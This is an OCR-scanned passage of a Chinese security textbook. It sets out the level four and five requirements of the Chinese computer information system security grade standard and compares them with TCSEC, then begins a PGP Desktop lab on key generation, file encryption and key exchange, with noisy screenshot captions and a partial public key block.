阻止 非 授权 用 户 访问 用 户 身份 鉴别 数据 。 通 过 为 用 户 提供 唯一 标识 ,计算 机 信息 系统 可 信 
计算 基 能 够 使 用 用 户 对 自己 的 行为 负责 。 计 算 机 信息 系统 可 信 计 算 基 还 具备 将 身份 标识 与 
该 用 户 所 有 可 审计 行为 相关 联 的 能 力 。 

5) 客体 重用 

在 计算 机 信息 系统 可 信 计 算 基 的 空闲 存储 客体 空间 中 ,对 客体 初始 指定 、 分 配 或 再 分 配 
一 个 主体 之 前 ,撤销 客体 所 含 信息 的 所 有 授权 。 当 主体 获得 对 一 个 已 被 释放 的 客体 的 访问 
权时 ,当前 主体 不 能 获得 原 主体 活动 所 产生 的 任何 信息 。 

6) 审计 

计算 机 信息 系统 可 信 计 算 基 能 创建 和 维护 受 保护 客体 的 访问 审计 跟踪 记录 ,并 能 阻止 
非 授权 的 用 户 对 它 访问 或 破坏 。 

计算 机 信息 系统 可 信 计 算 基 能 记录 下 述 事件 : 使 用 身份 鉴别 机 制 ; 将 客体 引入 用 户 地 
址 空间 (例如 ,打开 文件 ,程序 初始 化 ); 删除 客体 ; 由 操作 员 、 系 统管 理 员 或 (和 ) 系 统 安全 
管理 员 实施 的 动作 ,以 及 其 他 与 系统 安全 有 关 的 事件 。 对 于 每 一 事件 ,其 审计 记录 包括 : 事 
件 的 日 期 和 时 间 、 用 户 、 事 件 类 型 .事件 是 否 成 功 。 对 于 身份 鉴别 事件 ,审计 记录 包含 请 求 的 
来 源 ( 例 如 终端 标识 符 ); 对 于 客体 引入 用 户 地 址 空间 的 事件 及 客体 删除 事件 ,审计 记录 包 
含 客体 名 及 客体 的 安全 级 别 。 此 外 .计算 机 信息 系统 可 信 计 算 基 具有 审计 更 改 可 读 输 出 记 
号 的 能 力 。 对 不 能 由 计算 机 信息 系统 可 信 计 算 基 独 立 分 辩 的 审计 事件 ,审计 机 制 提供 审计 
记录 接口 ,可 由 授权 主体 调用 。 这 些 审计 记录 区 别 于 计算 机 信息 系统 可 信 计 算 基 独立 分 辩 
的 审计 记录 。 

7) 数据 完整 性 

计算 机 信息 系统 可 信 计 算 基 通过 自主 和 强制 完整 性 策略 ,阻止 非 授权 用 户 修改 或 破坏 
敏感 信息 。 在 网 络 环境 中 ,使 用 完整 性 敏感 标记 来 确信 信息 在 传送 中 未 受 损 。 


4. 第 四 级 ”结构 化 保护 级 


本 级 的 计算 机 信息 系统 可 信 计 算 基 建立 于 一 个 明确 定义 的 形式 化 安全 策略 模型 之 上 ， 
它 要 求 将 第 三 级 系统 中 的 自主 和 强制 访问 控制 扩展 到 所 有 主体 与 客体 。 此 外 ,还 要 考虑 隐 
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项 通道 。 本 级 的 计算 机 信息 系统 可 信 计 算 基 必须 结构 化 为 关键 保护 元 素 和 非 关 键 保护 元 
素 。 计 算 机 信息 系统 可 信 计 算 基 的 接口 也 必须 明确 定义 ,使 其 设计 与 实现 能 经 受 更 充分 的 
测试 和 更 完整 的 复审 。 加 强 了 鉴别 机 制 ; 支持 系统 管理 员 和 操作 员 的 职能 ; 提供 可 信 设 施 
管理 ; 增强 了 配置 管理 控制 。 系 统 具 有 相当 的 抗 渗透 能 力 。 本 级 有 以 下 考核 指标 的 要 求 。 

1) 自主 访问 控制 

计算 机 信息 系统 可 信 计 算 基 定义 和 控制 系统 中 命名 用 户 对 命名 客体 的 访问 。 实 施 机 制 
(例如 访问 控制 表 ) 允 许 命名 用 户 和 (或 ) 以 用 户 组 的 身份 规定 并 控制 客体 的 共享 ; 阻止 非 授 
权 用 户 读 取 敏感 信息 。 并 控制 访问 权限 扩散 。 自 主 访问 控制 机 制 根据 用 户 指 定 方式 或 默认 
方式 ,阻止 非 授 权 用 户 访问 客体 。 访 问 控制 的 粒度 是 单个 用 户 。 没 有 存 取 权 的 用 户 只 允许 
由 授权 用 户 指 定 对 客体 的 访问 权 。 

2) 强制 访问 控制 

计算 机 信息 系统 可 信 计 算 基 对 外 部 主体 能 够 直接 或 间接 访问 的 所 有 资源 (例如 ,主体 、 
存储 客体 和 输入 输出 资源 ?实施 强制 访问 控制 。 为 这 些 主体 及 客体 指定 敏感 标记 ,这 些 标记 
是 等 级 分 类 和 非 等 级 类 别 的 组 合 ,它们 是 实施 强制 访问 控制 的 依据 。 计 算 机 信息 系统 可 信 
计算 基 支 持 两 种 或 两 种 以 上 成 分 组 成 的 安全 级 。 计 算 机 信息 系统 可 信 计 算 基 外 部 的 所 有 主 
体 对 客体 的 直接 或 间接 的 访问 应 满足 : 仅 当主 体 安全 级 中 的 等 级 分 类 高 于 或 等 于 客体 安全 
级 中 的 等 级 分 类 , 且 主 体 安全 级 中 的 非 等 级 类 别 包含 了 客体 安全 级 中 的 全 部 非 等 级 类 别 , 主 
体 才 能 读 客体 ; 仅 当 主体 安全 级 中 的 等 级 分 类 低 于 或 等 于 客体 安全 级 中 的 等 级 分 类 , 且 主 
体 安 全 级 中 的 非 等 级 类 别 包含 于 客体 安全 级 中 的 非 等 级 类 别 , 主 体 才 能 写 一 个 客体 。 计 算 
机 信息 系统 可 信 计 算 基 使 用 身份 和 鉴别 数据 ,鉴别 用 户 的 身份 ,保护 用 户 创建 的 计算 机 信息 
系统 可 信 计 算 基 外 部 主体 的 安全 级 和 授权 受 该 用 户 的 安全 级 和 授权 的 控制 。 

3) 标记 

计算 机 信息 系统 可 信 计 算 基 维护 与 可 被 外 部 主体 直接 或 间接 访问 到 的 计算 机 信息 系统 
资源 (例如 ,主体 .存储 客体 .只 读 存 储 器 ) 相 关 的 敏感 标记 。 这 些 标记 是 实施 强制 访问 的 基 
础 。 为 了 输入 未 加 安全 标记 的 数据 ,计算 机 信息 系统 可 信 计 算 基 向 授权 用 户 要 求 并 接受 这 
些 数据 的 安全 级 别 , 且 可 由 计算 机 信息 系统 可 信 计 算 基 审计 。 

4) 身份 鉴别 

计算 机 信息 系统 可 信 计 算 基 初始 执行 时 ,首先 要 求 用 户 标识 自己 的 身份 ,而 且 , 计 算 机 
信息 系统 可 信 计 算 基 维 护 用 户 身份 识别 数据 并 确定 用 户 访问 权 及 授权 数据 。 计 算 机 信息 系 
统 可 信 计 算 基 使 用 这 些 数据 ,鉴别 用 户 身 份 ,并 使 用 保护 机 制 (例如 口令 ) 来 鉴别 用 户 的 身 
份 ; 阻止 非 授 权 用 户 访问 用 户 身份 鉴别 数据 。 通 过 为 用 户 提供 唯一 标识 ,计算 机 信息 系统 
可 信 计 算 基 能 够 使 用 户 对 自己 的 行为 负责 。 计 算 机 信息 系统 可 信 计 算 基 还 具备 将 身份 标识 
与 该 用 户 所 有 可 审计 行为 相关 联 的 能 力 。 

5) 客体 重用 

在 计算 机 信息 系统 可 信 计 算 基 的 空闲 存储 客体 空间 中 ,对 客体 初始 指定 、 分 配 或 再 分 配 
一 个 主体 之 前 ,撤销 客体 所 含 信息 的 所 有 授权 。 当 主体 获得 对 一 个 已 被 释放 的 客体 的 访问 
权时 ,当前 主体 不 能 获得 原 主 体 活动 所 产生 的 任何 信息 。 

6) 审计 

计算 机 信息 系统 可 信 计 算 基 能 创建 和 维护 受 保护 客体 的 访问 审计 跟踪 记录 ,并 能 阻止 
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非 授权 的 用 户 对 它 访问 或 破坏 。 

计算 机 信息 系统 可 信 计 算 基 能 记录 下 述 事件 : 使 用 身份 鉴别 机 制 ; 将 客体 引入 用 户 地 
址 空间 (例如 ,打开 文件 ,程序 初始 化 ); 删除 客体 ; 由 操作 员 、 系 统管 理 员 或 (和 ) 系 统 安全 
管理 员 实施 的 动作 ,以 及 其 他 与 系统 安全 有 关 的 事件 。 对 于 每 一 事件 ,其 审计 记录 包括 : 事 
件 的 日 期 和 时 间 、 用 户 、 事 件 类 型 事件 是 否 成 功 。 对 于 身份 鉴别 事件 ,审计 记录 包含 请 求 的 
来 源 ( 例 如 终端 标识 符 ); 对 于 客体 引入 用 户 地 址 空间 的 事件 及 客体 删除 事件 ,审计 记录 包 
含 客体 及 客体 的 安全 级 别 。 此 外 ,计算 机 信息 系统 可 信 计 算 基 具有 审计 更 改 可 读 输 出 记号 
的 能 力 。 

对 不 能 由 计算 机 信息 系统 可 信 计 算 基 独 立 分 辩 的 审计 事件 ,审计 机 制 提供 审计 记录 接 
口 ,可 由 授权 主体 调用 。 这 些 审计 记录 区 别 于 计算 机 信息 系统 可 信 计 算 基 独立 分 辨 的 审计 

计算 机 信息 系统 可 信 计 算 基 能 够 审计 利用 隐蔽 存储 信道 时 可 能 被 使 用 的 事件 。 

7) 数据 完整 性 

计算 机 信息 系统 可 信 计 算 基 通过 自主 和 强制 完整 性 策略 。 阻 止 非 授权 用 户 修改 或 破坏 
敏感 信息 。 在 网 络 环境 中 ,使 用 完整 性 敏感 标记 来 确信 信息 在 传送 中 未 受 损 。 

8) 隐蔽 信道 分 析 

系统 开发 者 应 彻底 搜索 隐蔽 存储 信道 ,并 根据 实际 测量 或 工程 估算 确定 每 一 个 被 标识 
信道 的 最 大 带宽 。 

9) 可 信 路 径 

对 用 户 的 初始 登录 和 鉴别 ,计算 机 信息 系统 可 信 计 算 基 在 它 与 用 户 之 间 提 供 可 信 通 信 
路 径 。 该 路 径 上 的 通信 中 能 由 该 用 户 初始 化 。 


5. 第 五 级 ”访问 验证 保护 级 


本 级 的 计算 机 信息 系统 可 信 计 算 基 满足 访问 监控 器 需求 。 访 问 监控 器 仲裁 主体 对 客体 
的 全 部 访问 。 访 问 监 控 器 本 身 是 抗 自 改 的 ; 必须 足够 小 ,能 够 分 析 和 测试 。 为 了 满足 访问 
监控 器 需求 ,计算 机 信息 系统 可 信 计 算 基 在 其 构造 时 ,排除 那些 对 实施 安全 策略 来 说 并 非 必 
要 的 代码 ; 在 设计 和 实现 时 ,从 系统 工程 角度 将 其 复杂 性 降低 到 最 小 程度 。 支 持 安全 管理 
员 职 能 ; 扩充 审计 机 制 , 当 发 生 与 安全 相关 的 事件 时 发 出 信号 ; 提供 系统 恢复 机 制 。 系 统 
具有 很 高 的 抗 渗透 能 力 。 本 级 有 以 下 考核 指标 的 要 求 。 

1) 自主 访问 控制 

计算 机 信息 系统 可 信 计 算 基 定 义 并 控制 系统 中 命名 用 户 对 命名 客体 的 访问 。 实 施 机 制 
(例如 访问 控制 表 ) 允 许 命名 用 户 和 (或 ) 以 用 户 组 的 身份 规定 并 控制 客体 的 共享 ; 阻止 非 授 
权 用 户 读 取 敏感 信息 。 并 控制 访问 权限 扩散 。 

自主 访问 控制 机 制 根据 用 户 指定 方式 或 默认 方式 ,阻止 非 授权 用 户 访问 客体 。 访 问 控 
制 的 粒度 是 单个 用 户 。 访 问 控制 能 够 为 每 个 命名 客体 指定 命名 用 户 和 用 户 组 ,并 规定 他 们 
对 客体 的 访问 模式 。 没 有 存 取 权 的 用 户 只 允许 由 授权 用 户 指定 对 客体 的 访问 权 。 

2) 强制 访问 控制 

计算 机 信息 系统 可 信 计 算 基 对 外 部 主体 能 够 直接 或 间接 访问 的 所 有 资源 (例如 主体 、 存 
储 客体 和 输入 输出 资源 ) 实 施 强制 访问 控制 。 为 这 些 主 体 及 客体 指定 敏感 标记 ,这 些 标记 是 
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等 级 分 类 和 非 等 级 类 别 的 组 合 , 它 们 是 实施 强制 访问 控制 的 依据 。 计 算 机 信息 系统 可 信 计 
算 基 支持 两 种 或 两 种 以 上 成 分 组 成 的 安全 级 。 计 算 机 信息 系统 可 信 计 算 基 外 部 的 所 有 主体 
对 客体 的 直接 或 间接 的 访问 应 满足 : 仅 当 主体 安全 级 中 的 等 级 分 类 高 于 或 等 于 客体 安全 级 
中 的 等 级 分 类 , 且 主 体 安全 级 中 的 非 等 级 类 别 包 含 了 客体 安全 级 中 的 全 部 非 等 级 类 别 ,主体 
才能 读 客体 ; 仅 当主 体 安 全 级 中 的 等 级 分 类 低 于 或 等 于 客体 安全 级 中 的 等 级 分 类 , 且 主体 
安全 级 中 的 非 等 级 类 别 包含 了 客体 安全 级 中 的 非 等 级 类 别 ,主体 才能 写 一 个 客体 。 计 算 机 
信息 系统 可 信 计 算 基 使 用 身份 和 鉴别 数据 ,鉴别 用 户 的 身份 ,保证 用 户 创建 的 计算 机 信息 系 
统 可 信 计 算 基 外 部 主体 的 安全 级 和 授权 受 该 用 户 的 安全 级 和 授权 的 控制 。 

3) 标记 

计算 机 信息 系统 可 信 计 算 基 维护 与 可 被 外 部 主体 直接 或 间接 访问 到 计算 机 信息 系统 资 
源 (例如 ,主体 、 存 储 客体 、 只 读 存储 器 ) 相 关 的 敏感 标记 。 这 些 标记 是 实施 强制 访问 的 基础 。 
为 了 输入 未 加 安全 标记 的 数据 ,计算 机 信息 系统 可 信 计 算 基 向 授权 用 户 要 求 并 接受 这 些 数 
据 的 安全 级 别 , 且 可 由 计算 机 信息 系统 可 信 计 算 基 审 计 。 

4) 身份 鉴别 

计算 机 信息 系统 可 信 计 算 基 初始 执行 时 ,首先 要 求 用 户 标识 自己 的 身份 ,而 且 , 计 算 机 
信息 系统 可 信 计 算 基 维护 用 户 身份 识别 数据 并 确定 用 户 访问 权 及 授权 数据 。 计 算 机 信息 系 
统 可 信 计 算 基 使 用 这 些 数据 ,鉴别 用 户 身份 ,并 使 用 保护 机 制 ( 例 如 口令 ) 来 鉴别 用 户 的 身 
份 ; 阻止 非 授权 用 户 访问 用 户 身份 鉴别 数据 。 通 过 为 用 户 提供 唯一 标识 ,计算 机 信息 系统 
可 信 计 算 基 能 够 使 用 户 对 自己 的 行为 负责 。 计 算 机 信息 系统 可 信 计 算 基 还 具备 将 身份 标识 
与 该 用 户 所 有 可 审计 行为 相关 联 的 能 力 。 

5) 客体 重用 

在 计算 机 信息 系统 可 信 计 算 基 的 空闲 存储 客体 空间 中 ,对 客体 初始 指定 、 分 配 或 再 分 配 
一 个 主体 之 前 ,撤销 客体 所 含 信息 的 所 有 授权 。 当 主体 获得 对 一 个 已 被 释放 的 客体 的 访问 
权时 ,当前 主体 不 能 获得 原 主体 活动 所 产生 的 任何 信息 。 

6) 审计 

计算 机 信息 系统 可 信 计 算 基 能 创建 和 维护 受 保护 客体 的 访问 审计 跟踪 记录 ,并 能 阻止 
非 授 权 的 用 户 对 它 访问 或 破坏 。 

计算 机 信息 系统 可 信 计 算 基 能 记录 下 述 事 件 : 使 用 身份 鉴别 机 制 ; 将 客体 引入 用 户 地 
址 空间 (例如 ,打开 文件 ,程序 初始 化 ); 删除 客体 ; 由 操作 员 、 系 统管 理 员 或 (和 ) 系统 安 全 
管理 员 实施 的 动作 ,以 及 其 他 与 系统 安全 有 关 的 事件 。 对 于 每 一 事件 ,其 审计 记录 包括 : 事 
件 的 日 期 和 时 间 、 用 户 、 事 件 类 型 .事件 是 否 成 功 。 对 于 身份 鉴别 事件 ,审计 记录 包含 请 求 的 
来 源 (例如 终端 标识 符 ); 对 于 客体 引入 用 户 地 址 空间 的 事件 及 客体 删除 事件 ,审计 记录 包 
含 客体 名 及 客体 的 安全 级 别 。 此 外 ,计算 机 信息 系统 可 信 计 算 基 具有 审计 更 改 可 读 输 出 记 
号 的 能 力 。 

对 不 能 由 计算 机 信息 系统 可 信 计 算 基 独立 分 辩 的 审计 事件 ,审计 机 制 提供 审计 记录 接 
口 , 可 由 授权 主体 调用 。 这 些 审计 记录 区 别 于 计算 机 信息 系统 可 信 计 算 基 独立 分 辨 的 审计 
记录 。 计 算 机 信息 系统 可 信 计 算 基 能 够 审计 利用 隐蔽 存储 信道 时 可 能 被 使 用 的 事件 。 

计算 机 信息 系统 可 信 计 算 基 包含 能 够 监控 可 审计 安全 事件 发 生 与 积累 的 机 制 , 当 超过 
阅 值 时 ,能 够 立即 向 安全 管理 员 发 出 报警 。 并 且 ,如 果 这 些 与 安全 相关 的 事件 继续 发 生 或 积 
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累 ,系统 应 以 最 小 的 代价 终止 它们 。 

7) 数据 完整 性 

计算 机 信息 系统 可 信 计 算 基 通过 自主 和 强制 完整 性 策略 ,阻止 非 授权 用 户 修改 或 破坏 
敏感 信息 。 在 网 络 环境 中 ,使 用 完整 性 敏感 标记 来 确信 信息 在 传送 中 未 受 损 。 

8) 隐蔽 信道 分 析 

系统 开发 者 应 彻底 搜索 隐蔽 信道 ,并 根据 实际 测量 或 工程 估算 确定 每 一 个 被 标识 信道 
的 最 大 带宽 。 

9) 可 信 路 径 

当 连 接 用 户 时 (例如 注册 .更改 主体 安全 级 ) ,计算 机 信息 系统 可 信 计 算 基 提供 它 与 用 户 
之 间 的 可 信 通 信 路 径 。 可 信 路 径 上 的 通信 只 能 由 该 用 户 或 计算 机 信息 系统 可 信 计 算 基 激 
活 ,在 逻辑 上 与 其 他 路 径 上 的 通信 相隔 离 , 且 能 正确 地 加 以 区 分 。 

10) 可 信和 恢复 

计算 机 信息 系统 可 信 计 算 基 提 供 过 程 和 机 制 , 保 证 计算 机 信息 系统 失效 或 中 断后 ,可 以 
进行 不 损害 任何 安全 保护 性 能 的 恢复 。 


1433 对 标准 的 分 析 


从 等 级 的 划分 可 以 看 出 ,从 第 三 安全 级 开始 增加 了 强制 访问 控制 的 要 求 , 同 时 保留 了 自 
主 访问 控制 安全 要 求 。 自 主 访问 控制 允许 某 客 体 的 主体 授权 其 他 主体 向 其 客体 写 数据 ,这 
样 可 以 解决 低 完整 性 级 别 的 主体 向 高 完整 性 级 别 的 客体 写 入 数据 的 问题 。 对 于 要 求 达到 第 
三 级 以 上 安全 等 级 的 系统 ,需要 以 强制 访问 控制 为 主 ,只 能 在 有 限 的 主体 范围 内 允许 自主 访 
问 控制 。 考 虑 到 在 网 络 环境 中 ,数据 在 传输 过 程 中 可 能 受 损 , 因 此 在 数据 完整 性 要 求 中 , 特 
意 要 求 使 用 完整 性 敏感 标记 来 确信 信息 在 传输 过 程 中 没有 受到 损害 。 

和 TCSEC 比较 来 看 ,第 五 等 级 并 不 简单 地 对 应 TCSEC 的 B3 等 级 ,实际 上 还 包含 了 部 
分 Al 安全 级 的 要 求 。B3 安全 级 要 求 系统 由 主体 /客体 安全 保护 区 域 ,. 有 能 力 实现 对 每 个 
客体 的 访问 控制 ,使 每 次 访问 都 受到 检查 ,客体 的 访问 区 域 限定 在 某 个 安全 区 域内 ,但 这 些 
要 求 并 未 在 第 五 安全 级 内 明确 体现 。Al 安全 级 要 求 对 系统 的 形式 模型 有 充分 的 验证 ,要 
求 有 顶级 涉及 与 系统 形式 模型 的 一 致 性 说 明 ,并 要 求 对 隐蔽 信道 的 分 析 说 明 , 因 此 ,第 五 等 
级 更 接近 TCSEC 中 的 Al 级 。 


本 章 共 包含 八 个 实验 内 容 , 读 者 可 以 通过 这 些 内 容 , 进 一 步 加 深 对 信息 安全 基础 理论 的 
理解 ,掌握 安全 理论 与 技术 的 应 用 方法 。 

实验 中 牵涉 到 的 软件 一 般 为 开源 软件 或 者 免费 软件 ,使 用 广泛 ,每 一 种 软件 都 给 了 相应 
的 官方 网 站 ,可 以 下 载 使 用 。 


15.1 PGP 软件 的 使 用 
15.1.1 实验 目的 、 环 境 及 背景 知识 


1. 实验 目的 


理解 公 钥 加 密 体 制 的 加 密 、 解 密 过 程 以 及 密 钥 使 用 方式 ; 了 解密 钥 的 管理 方式 和 信任 
关系 ; 了 解数 字 签 名 的 基本 概念 和 使 用 方式 ,包括 如 何 对 文件 进行 签名 、 验 证 ; 掌握 PGP 的 
体系 结构 和 应 用 原理 。 


2. 实验 环境 


硬件 : 主流 配置 计算 机 。 
软件 : 安装 Windows 2000/2003/XP 操作 系统 ,PGP Desktop 9.0 版 。 


3. 背景 知识 


PGP(Pretty Good Privacy) 是 一 个 应 用 广泛 的 加 密 、 数 字 签名 应 用 软件 ,用 来 保护 私 隐 
信息 。 以 前 ,PGP 是 一 种 邮件 加 密 软件 ,被 用 于 保证 邮件 在 传输 过 程 中 的 保密 性 和 不 可 否 
认 性 。 目 前 ,PGP 已 经 发 展 到 9.X 版本, 它 的 应 用 已 经 超出 邮件 范围 ,在 文件 加 密 、 数 字符 
名 、 安 全 删除 等 方面 都 有 着 非常 专业 的 应 用 。 

目前 ,PGP 有 面向 普通 用 户 的 Desktop 版 本 和 面向 企业 用 户 的 Universal 版 本 。 官 方 网 站 
(http://www. pgp. com) 上 能 够 下 载 到 的 目前 为 9. 8 版 ,但 是 其 安装 文件 的 体积 已 经 急剧 膨胀 
到 了 78MB, 而 9.0 版 则 为 23MB, 适 合 普通 用 户 使 用 。 本 实验 采用 的 是 Desktop 9.0 版 。 
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PGP 采用 的 加 密 体 制 为 非 对 称 加 密 体 制 , 即 公 钥 加 密 体 制 。 通 信 时 ,传输 内 容 用 对 方 
的 公 钥 加 密 ,对 方 收 到 后 ,用 自己 的 私 钥 解密 。 在 进行 数字 签名 时 , 则 用 自己 的 私 钥 对 内 容 
进行 签名 ,对方 收 到 后 用 对 应 的 公 钥 来 进行 验证 。 

PGP 在 密 钥 管理 方面 采用 了 基于 用 户 信 任 的 模式 ,其 密 钥 对 由 软件 自动 生成 , 私 钥 由 
用 户 通过 密码 进行 保护 。 

PGP 能 完成 文件 加 密 .解密 、 数 字 签 名 及 验证 .电子 邮件 加 密 以 及 即时 通信 加 密 (目前 
只 支持 AIM, 不 支持 MSN 等 即时 通信 软件 ) 。 


15.12 实验 步骤 


1. 安装 


解压 缩 包 后 ,机 器 重启 动 开始 安装 ,部 分 计算 机 可 能 需要 重新 启动 两 次 。 安 装 过 程 中 基 
本 上 只 需 单 击 “下 一 步 ? 按 钮 (如 图 15-1 所 示 ) 。 


POP Setup Kssistant 


和 User Type 
This assistant wil help you configure PGP and initialze your keys. 
DBGB Deskip 9 


Enable User Please select one 
New User 
人 Oamanew user, 
Fles Ihave used PGP before and 1 have existing keys, 
Key Generation 
Global Directory 
Messaging 
dditional Features 


图 15-1 进入 安装 PGP 的 界面 


新 用 户 注 册 需 要 输入 用 户 名 ,也 就 是 使 用 者 的 名 字 和 E-mail 地 址 ,用 来 标识 密 钥 对 。 
可 以 任意 输入 (如 图 15-2 所 示 )。 

然后 ,用 户 输入 一 串 字 符 作为 保存 私 钥 的 密码 ,不 少 于 8 个 字符 ,这 串 密码 需要 用 户 牢 
记 。 今 后 在 使 用 私 钥 的 时 候 就 需要 输入 这 串 密 码 ( 如 图 15-3 所 示 ) 。 

软件 自动 为 用 户 生 成 密 钥 对 。 


2. 主 界面 介绍 
在 “开始 ”菜单 里 面 会 找到 新 安装 好 的 PGP Desktop。 打 开 后 界面 如 图 15-4 所 示 。 


PGP Setup Assistant 

Name and Email Assignment 
Da Every key par must have a name assocated with t. The name and emal addess et 
也 P|slr Deskiong i 


Enable User = 
New User Ful Name: ETE 


Primary Email，|pingxionanle126. com | More> 


Key Generation 


Global Directory 
Messaging 
nal Features 


15-2 新 用 户 注册 


PGP Setop Assistant 


Passphrase Assignment 


ja Your private key wil be protected Lt that ths 
是 Gilp Desktop 9 key ee ‘is important that you keep 
1 


Enable User 
New User Your passphrase should be at least 8 characters long and should contain 
Key Generation non-alphabetic characters. 


Show Keystrokes 


Messaging 
nal Features 


图 15-3 生成 密 钥 


目前 此 界面 中 只 有 用 户 本 人 的 密 钥 对 。 同 时 在 托盘 栏 上 会 显示 一 把 小 锁 
[EE , 单 击 右键 可 以 看 到 一 些 快捷 功能 。 

用 户 的 私 钥 在 开机 第 一 次 输入 后 ,PGP 会 默认 将 其 存放 在 缓存 中 ,用 到 时 就 无 须 专门 
输入 ,其 显示 为 访 , 如 果 不 希 望 存放 在 缓存 中 ,可 以 单 击 右键 选择 clear caches。 
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m PGP Desktop “AllKeys 
Fle Edt Vew Tools keys Hep 


和 Newpepzp veriyrepzp ShedFies keysearh Ssymckeys rd ee 
AllKeys 加 回回 


愉 mpwvaeens 反倒 
以 Searchforkeys 


图 15-4 PGP Desktop 主 界面 


3. 加 密 、 解 密 本 地 文件 


在 只 有 用 户 自己 的 密 钥 对 时 ,可 以 加 密 、 解 密 本 地 的 文件 。 加 密 的 方式 有 几 种 ,甚至 可 
以 不 打开 Desktop, 直接 在 需要 加 密 的 文件 上 单 击 右键 (如 图 15-5 所 示 )。 


一 一 一 -~ 
grey 
中 3 
”Encrypt & Sign 
Shred 


| Create 5DA 


图 15-5 加 密 本 地 文件 


在 快捷 菜单 中 选择 Encrypt 出 现 一 个 选择 密 钥 的 对 话 框 (如 图 15-6 所 示 ) 。 

默认 使 用 本 人 的 密 钥 进 行 加 密 , 直 接 单 击 OK, 即 可 完成 加 密 , 生 成 加 密 文件 ,加 密 后 的 
文件 后 缀 名 为 . pgp。 

解密 时 双击 被 加 密 文 件 的 图 标 , 会 产生 对 话 框 ,如 图 15-7 所 示 。 
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WW POP Desktop ~ Key Selection Dialog 


Drag users from this lst to the Recipe 


Recpienks 
xiongpng <pngxiong01@126.com> 


[riongping 人 inexionat018126. com> (RSA/2048) 


Show Keystokes 
Enter passphiase for your private key ; 


Ce) Cam 


图 15-7 输入 解密 口令 


上 面 一 行 显示 此 文件 由 谁 的 密 钥 进行 加 密 , 解 密 者 在 空白 框 中 输入 相应 的 私 钥 密 码 ( 在 
图 15-3 中 输入 的 密码 。 注 意 , 此 密码 并 非 私 钥 本 身 ) 即 可 解密 。 解密 后 的 文件 可 以 在 pgp 
desktop 中 看 到 如 图 15-8 所 示 的 界面 。 


A My rnvare reys 


OQ search for Keys Location; ”E;\ 教 材 pgp 
Size: 0.97 MB 

2 国生 

2 pop'2ln.com 

[] MessagingLog 

Date Modified 

国 pgp.doc 1.20 MB ”Microsoft Word 文档 2008-4-19 10:42 

. 引 新 建文 本 文档 


15-8 解密 文件 在 主 窗口 显示 
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4. 加 密 、 解 密 同伴 文件 


这 种 加 密 文件 的 目的 是 为 了 通信 双方 的 文件 安全 传送 ,也 就 是 说 ,A 加 密 的 文件 ,B 
收 到 以 后 可 以 顺利 打开 。 这 就 需要 双方 不 但 要 有 自己 的 密 钥 对 ,还 需要 有 对 方 的 公 钥 ， 
传送 前 ,A 用 对 方 B 的 公 钥 对 文件 进行 加 密 ,B 收取 后 用 自己 的 私 钥 进行 解密 还 原 出 
明文 。 

首先 双方 互相 交换 自己 的 公 钥 。 从 PGP 中 导出 自己 的 密 钥 并 发 送 给 对 方 ,注意 这 里 导 
出 的 是 公 钥 ,而 不 是 密 钥 对 ,在 需要 导出 的 密 钥 上 单 击 右键 (如 图 15-9 所 示 ) 。 


PE YA NEYS 图 
Alkeys | Name Emal valdty 
BR My Private Keys 田 < alce alice@126,com © 
Search for Kt 田 念 pingxiong01@126.com 
以 or Keys 汪 :ionopno oa 
@ a Send To 
PW Emailthis Key i 
二 Copy Pubic Key 
PGPMessagng ~ t 
2 pop,21lcn.com Delete 
回 Messaging Log 
Reyoke 
a 引 
EE 
-一 名 Key Properties 
mi 
A) pap,doc 
图 15-9 导出 公 钥 


然后 单 击 export key, 保 存 为 . acs 文件 ,这 个 公 钥 文件 使 用 二 进 制 ASCII 码 保存 ,如 果 
用 写字 板 打开 ,可 以 看 到 内 容 如 图 15-10 所 示 。 

这 种 文字 显然 没有 人 能 够 读 懂 , 也 无 法 根据 此 公 钥 推导 出 私 钥 。 通 过 电子 邮件 或 者 网 
上 邻居 把 此 . asc 文件 传送 给 同伴 。 同 样 , 同 伴 也 导出 自己 的 公 钥 ,传送 过 来 。 在 接收 到 同 
伴 的 公 钥 后 ,导入 到 PGP 密 钥 环 中 ,双击 接收 到 的 . asc 文件 ,然后 出 现 如 图 15-11 所 示 的 对 
话 框 。 

选择 import, 此 时 ,在 主 界面 中 就 出 现 了 密 钥 的 信息 ,如 图 15-12 所 示 。 

但 是 这 个 密 钥 后 面 的 validity 属性 还 不 是 绿色 ,而 是 白色 ,表明 正确 性 没有 被 验证 ,也 
就 是 主人 还 没有 完全 信任 这 把 钥匙 。 可 以 用 其 加 密 文件 ,但 还 不 能 用 它 验证 数字 签名 。 

解决 方法 是 主人 用 自己 的 私 钥 对 这 把 新 来 的 钥匙 进行 签名 ,表示 自己 已 经 认可 了 。 具 
体 方法 是 在 新 钥匙 上 单 击 右键 ,选择 sign, 出 现 这 样 如 图 15-13 所 示 的 对 话 框 。 

单 击 OK 后 输入 主人 的 那 串 密码 ,就 签名 成 功 ,新 钥匙 后 面 的 圆 点 变 成 绿色 。 

最 后 加 密 需要 传输 给 同伴 的 文件 。 选 择 要 加 密 文件 ,用 刚 导 入 的 对 方 的 公 钥 进行 加 密 ， 
会 生成 一 个 新 的 文件 ,这 就 是 加 密 后 的 文件 。 可 以 通过 各 种 方式 把 这 个 文件 传送 给 对 方 。 
对 方 接收 后 直接 双击 ,然后 输入 自己 的 私 钥 来 解密 ,得 到 明文 文件 。 

注意 此 时 加 密 后 的 文件 本 人 是 无 法 打开 的 ,只 能 是 拥有 对 应 私 钥 的 用 户 可 以 打开 ,以 保 
证 文件 在 传输 过 程 中 的 机 密 性 。 
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——-—-BEGIN PGP PUBLIC KEY BLOCK-————— 
Yersion: PGP Desktop 9.0.5 - Enterprise license 


mAENBEgEovdBCADM8UoAmnM2 lwCAMG Swt NAErr LZvt 8azMu6F618Gt wDdk3IDO1nT 
S1ZemAWsJ3IRJiFJD4r+3FQNYiXjKJOhI82Yh7TIEWybwkv8K16aEgvOkjjNIkcZu 
GCLooNpybmlqdXaakgvNdKvpSeLQ3eI0OL36EGUb0ONAj2SLEsDAuy567erQd2sh6n 
YrMIqbdyHOWNFzjU05/ikZkiLNWzHIDSQvXfC6Wjuz5iWboncAObnlYYEuqEZEYS 
M3cKDFUPS80731k1zS8dyzbwm6398joEAUMbAQbcZUPSq43TwSMwmPRSPhHyVbUwYR 
YQ3LiTwbUqC Swz5aAOwW6F TAHUt 21RtN2XPBABEBAAGOH3hpb25ncG luZyA8cGlu 
ZT3hpb25nMDFAMTI2LmNybT6JAWOEEAECAFcFAkeEovdwF TAAAAAATAAHCHT 1ZmYy 
